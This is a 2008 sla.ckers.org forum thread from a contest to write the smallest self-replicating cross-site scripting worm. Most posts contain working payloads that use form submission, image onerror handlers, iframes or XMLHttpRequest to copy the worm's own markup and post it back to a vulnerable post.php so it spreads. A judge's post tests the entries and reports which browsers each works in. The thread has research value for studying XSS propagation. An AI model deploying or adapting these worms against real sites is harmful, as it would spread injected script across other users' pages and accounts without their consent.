Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 04:16PM

With very many props to Sirdarckcat:
151
<form method="post" action="post.php"><input name="content" onfocus="content.value=document.body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>

Works in Firefox 2.0.0.11, doesn't work in IE6.0 ;x, can someone test it in IE7?

Edit: Forgot about Firefox adding stuff again.



Edited 1 time(s). Last edit at 01/05/2008 04:21PM by Spyware.

Re: Diminutive XSS Worm Replication Contest
Posted by: shawn
Date: January 05, 2008 04:18PM

This does work without expanding, though:

<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),146))</script>

Trimmed a few and tested. Unless I missed something else... :-)

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 04:19PM

shawn:

Should be 143, but awesome!! You are in first place now.

and the obvious one without issues:
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',_[0].value='<form>'+innerHTML.slice(alert('XSS'),152))">

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 01/05/2008 04:24PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Alex
Date: January 05, 2008 04:20PM

@shawn: Well, I'm doing a lot of optimization on the codes, but it only gets larger. :D
I've replaced a couple of chars with shorter ones, but when it comes to defining all the new variables, it beats me every time ...

---
~~Patching is for suckers~~

http://www.bitsploit.de

Re: Diminutive XSS Worm Replication Contest
Posted by: Alex
Date: January 05, 2008 04:25PM

@sirdarckcat:

And where is: _ ? ;)

---
~~Patching is for suckers~~

http://www.bitsploit.de



Edited 1 time(s). Last edit at 01/05/2008 04:25PM by Alex.

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 04:27PM

Sorry for this stupid question, but do you have to set name.value and document.body.etc in IE7? Because this:

<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>

Works in Firefox. It's 134 characters, but I have the feeling that IE can't handle this stuff anymore. Since I don't want to install IE7 on my computer, can anyone please test this / tell me if I need name in [name.value] and document in [document.body.etc].

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 05, 2008 04:31PM

<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+parentNode.innerHTML.slice(alert('xss'),132))">

136

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 04:31PM

Alex, you're right lol

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 04:33PM

ma1:
I don't know if onfocus is valid..

haha I'll let rsnake decide xD

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 04:38PM

These are the places, without numbers:

.- ma1 (129) [requires the user to focus a field]
.- Spyware (134) [requires the user to focus a field]
.- shawn (153) <form> (with doctype issues)
.- ma1 (156) <form> (with doctype issues)
.- sirdarckcat (158) (with doctype issues)
.- sirdarckcat (161)
.- ma1 (163) <form>
.- ritz (167) <form>
.- babarianbob (168) <form>
.- .mario (178) <form>
.- Gareth Heyes (229) <form>
.- Matt Presson (233) <form>
.- digi7al64 (266) <form>

the first 4 may not be valid, depends on rsnake

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 04:58PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 04:40PM

sirdarckcat Wrote:
-------------------------------------------------------
> or what do you mean?

I was exactly trying to say that :-).

Spyware Wrote:
-------------------------------------------------------
> <form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/<f.*/);alert('xss');submit()"></form>

Very nice, but what if there is another <f.* tag name in front of your code, say the never-used FONT ;-) (not even talking about another form or fieldset; I hope it won't be a frame/frameset page, because then no single vector given here would work). See the W3C index of elements.

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 05, 2008 04:46PM

Just in case...
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),123))">

129

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 04:52PM

ý<form method="post" action="post.php"><input name="content" onfocus="value=body.innerHTML.match(/ý.*/);alert('xss');submit()"></form>

Which comes down to.. heh.. 134. And this probably won't work in IE7, and I can't remove the damned </form> tag.

Ah well.

Re: Diminutive XSS Worm Replication Contest
Posted by: bwb labs
Date: January 05, 2008 04:57PM

In response to sirdarckcat <form> list, let's make an XMLHttpResponse list too ;-).

- bwb labs (193 bytes) [without Content-Type]
- bwb labs (264 bytes) [with Content-Type]

Haven't seen other stable working versions yet (the ones that use function toString have growing problems on FF).
Here is the long version with Content-Type:
<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.setRequestHeader('Content-Type','application/x-www-form-urlencoded');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>

Re: Diminutive XSS Worm Replication Contest
Posted by: shawn
Date: January 05, 2008 04:58PM

ma1 Wrote:
-------------------------------------------------------
> Just in case...
> <form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),123))">
>
> 129

Well, if we can use events, why not do:

<form><input name="content" onblur="submit(action=(method='post')+'.php',value='<form>'+form.innerHTML.slice(alert('XSS'),122))">

...and drop another byte?

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 05:02PM

I think events like that won't be valid..

.- shawn (128) [requires the user to focus and blur a field]
.- ma1 (129) [requires the user to focus a field]
.- Spyware (134) [requires the user to focus a field]
.- shawn (153) <form> (with doctype issues)
.- ma1 (156) <form> (with doctype issues)
.- sirdarckcat (158) <form> (with doctype issues)
.- sirdarckcat (161)
.- ma1 (163) <form>
.- ritz (167) <form>
.- babarianbob (168) <form>
.- .mario (178) <form>
.- Gareth Heyes (229) <form>
.- Matt Presson (233) <form>
.- digi7al64 (266) <form>

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: shawn
Date: January 05, 2008 05:07PM

sirdarckcat Wrote:
-------------------------------------------------------
> I think events like that won't be valid..

I do agree with that for this exercise, though I can understand the opposing argument.

It seemed like just as valid an assumption to make: if a user draws focus to an element, the next action they take will draw focus away from that element.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 05:15PM

Unofficial judges:

with doctype
http://loteria-gratis.com.ar/judge1.php
without doctype
http://loteria-gratis.com.ar/judge2.php

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: hallvors
Date: January 05, 2008 05:31PM

Open questions for RSnake:
- can we omit XHR Content-Type header?
- can we omit urlencoding?

Neither of these would be a showstopper for the replication if post.php is a script we control or can make assumptions about - Apache/PHP don't need to parse the posted contents if the target script reads php://stdin or uses a similar method. Of course if we have to support target scripts that use the Apache/PHP $_POST variable parsing both Content-type and (probably, depends on what you post) urlencoding are required.

There are three main issues in this contest:
- how to make the code run (most use script element, img onerror, or various other events)
- how the code can read itself (most - all? - replies rely on innerHTML or function.toString) and what serialization/stringification rules in the UA you must take into account to avoid the code growing
- how to post back to the server (FORM.submit() or XMLHttpRequest are the only options since POST is required)

I contribute two variations nobody has explored so far, which I think solve problems 1 and 2 quite elegantly. First a note on Firefox behaviour: for these two examples to work in Firefox, it needs a full URL (http://..) and not just post.php. It appears to be a bug in Firefox where a base URL for resolving relative URLs against is missing from JavaScript-generated source. Ideally I'd like that bug not to be held against me :-p, and the extra length this problem adds to the code will of course depend on what server you test it from, so I give the character counts without taking this into account. As posted they don't "work" in Firefox..

Using IFRAME src and FORM post:

<iframe src="javascript:alert('XSS');onload=function(){f[0].value='<iframe src=\x22'+frameElement.src+'\x22>';f.submit()};'<form method=post action=post.php id=f><input name=content>'">

- 185 characters.

Using IFRAME src and XHR - note that I have left out the content-type and urlencoding:

<iframe src="javascript:alert('XSS');with(new top.XMLHttpRequest){open('post','post.php');send('content=<iframe src=\x22'+frameElement.src+'\x22>')}">

- 150 characters.

Awaiting a reply from RSnake on the two questions above and this one:
- if Firefox requires an absolute URL to post.php, can I still submit an entry with a relative URL? If no, what server name should I use?

Hallvord Reiar Michaelsen Steen
http://my.opera.com/hallvors/ http://www.hallvord.com/
+ Browsing with Opera :-) +

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 05:44PM

hallvors
as far as I've tested, your codes don't self-replicate.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 05:51PM

About the judges I made:

Use this one:
http://loteria-gratis.com.ar/judge2.php

Because judge1 is stricter..

And well, there are several codes that have minor mistakes, because they encode their payload, and you don't need to do that.

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: hallvors
Date: January 05, 2008 06:05PM

sirdarckcat: could you be more specific, how does it fail and in what browser? Tested in IE7 and Firefox 2 (with server name added).

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 06:15PM

Unofficial Judge Result:

Codes tested:
0.- ma1 (136) [requires user to focus a field]
<form><input name="content" onfocus="submit(action=(method='post')+'.php',value='<form>'+parentNode.innerHTML.slice(alert('xss'),132))">

1.- shawn (153) [doctype issues]
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',_[0].value='<form id=_>'+innerHTML.slice(alert('XSS'),143))</script>

2.- ma1 (156) [doctype issues]
<form id=_><input name="content"><script>with(_)submit(action=(method='post')+'.php',content.value='<form id=_>'+innerHTML.slice(alert('XSS'),147))</script>

3.- sirdarckcat (158) [doctype issues]
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.slice(0,148)))</SCRIPT>

4.- bwb labs (168) [DOESN'T WORK ON APACHE OR IIS]
<script>f=function(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>

5.- babarianbob (171)
<b><form id="f"><input name="content"><img src="" onerror="with(f)submit(alert('xss'),content.value=parentNode.innerHTML.bold(),action=(method='post')+'.php')"></form></b>

6.- .mario (178) 
<b><img src="m" onerror="alert('xss');with(nextSibling)content.value=parentNode.innerHTML.bold(),submit()"><form method="post" action="post.php"><input name="content"></form></b>

7.- Gareth Heyes (229) [CAN BE REDUCED]
<script>(function(){alert('XSS');document.write('<form method=post action=post.php><input type=image onerror="form.submit()" src><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>')})()</script>

8.- Matt Presson (233) [CAN BE REDUCED]
<script>alert('XSS');a='<scr'+'ipt>'+arguments.callee+'()</scr'+'ipt>';document.write('<form method=post action=post.php name=f><input value='+encodeURI(a)+' name=content></form>');body.onload=function(){document.f.submit()}</script>

9.- digi7al64 (266) [CAN BE REDUCED]
<p id=e><script>alert('xss');var d=document;s='script>';p='<form method=post name=f action=post.php><input name=content value="+escape("<p id=e>"+d.getElementById(\'e\').innerHTML+"</p>")+"></form><'+s+'d.f.submit();</'+s;p='d.write("'+p+'");'; eval(p);</script></p>

A.- sirdarckcat (161)
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(alert('XSS'),155))">

B.- ma1 (163)
<form><INPUT name="content"><IMG src="" onerror="with(parentNode)alert('XSS',submit(action=(method='post')+'.php',content.value='<form>'+innerHTML.slice(0,157)))">

C.- ritz (167)
<form><input name="content" src="" onerror="alert('xss');p=form;p.action=(p.method='post')+'.php';type=value='<form>'+p.innerHTML.substr(0,161);submit()" type="image">

0(136).- 3 Works on: IE FF(1 and 2) [requires user interaction]
1(153).- 2 Works on: IE FF(2)
2(156).- 2 Works on: IE FF(2)
3(158).- 2 Works on: IE FF(2)
4(168).- 0 Works on: NONE
5(171).- 2 Works on: IE FF(2)
6(178).- 3 Works on: IE FF(1 and 2)
7(229).- 0 Works on: NONE, encoding error
8(233).- 0 Works on: NONE
9(266).- 0 Works on: NONE, encoding error
A(161).- 3 Works on: IE FF(1 and 2)
B(163).- 3 Works on: IE FF(1 and 2)
C(167).- 3 Works on: FF(1 and 2)

So according to the unofficial judges the top are:
0(136).- 3 Works on: IE FF(1 and 2) [requires user interaction]
A(161).- 3 Works on: IE FF(1 and 2)
B(163).- 3 Works on: IE FF(1 and 2)
6(178).- 3 Works on: IE FF(1 and 2)

Because they work with any doctype

and the top in the general case:
0(136).- 3 Works on: IE FF(1 and 2) [requires user interaction]
1(153).- 2 Works on: IE FF(2)
2(156).- 2 Works on: IE FF(2)
3(158).- 2 Works on: IE FF(2)
A(161).- 3 Works on: IE FF(1 and 2)
B(163).- 3 Works on: IE FF(1 and 2)
C(167).- 3 Works on: FF(1 and 2) **?
5(171).- 2 Works on: IE FF(2)
6(178).- 3 Works on: IE FF(1 and 2)


Just take in consideration that "0"(one of ma1's codes) requires user interaction.

So.. this is not official..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: hallvors
Date: January 05, 2008 06:16PM

(If you use your PHP script to test it keep in mind that I have not added content-type to the XHR post pending RSnake's response to the question. I assume your PHP script doesn't see the post contents for this reason.)

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 06:16PM

@hallvors:
test your code here:
http://loteria-gratis.com.ar/judge2.php

I understand the issue with the XHR code, but the <form> is also not working

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 06:17PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: hallvors
Date: January 05, 2008 06:22PM

Just tested the <form> version there in IE7, it worked fine. If you test in Firefox you have to change post.php to the full URL to that script, as mentioned in my original post.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 06:25PM

@hallvors:
Ah I see, I missed that, sorry.
Yours is working fine; anyway, adding the length of the URL may be an issue.. let's see what rsnake says.

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/05/2008 06:26PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 06:41PM

Ah damned. Forgot the Firefox adding stuff thing -again-.

ý<form action="post.php" method="post"><input name="content" onclick="alert('xss');value=body.innerHTML.match(/ý.*/);" type="submit"></form>

140 Characters.



Edited 4 time(s). Last edit at 01/05/2008 06:51PM by Spyware.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 05, 2008 06:56PM

spyware:
yours doesn't work on IE

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: Diminutive XSS Worm Replication Contest
Posted by: Spyware
Date: January 05, 2008 06:57PM

Blast.
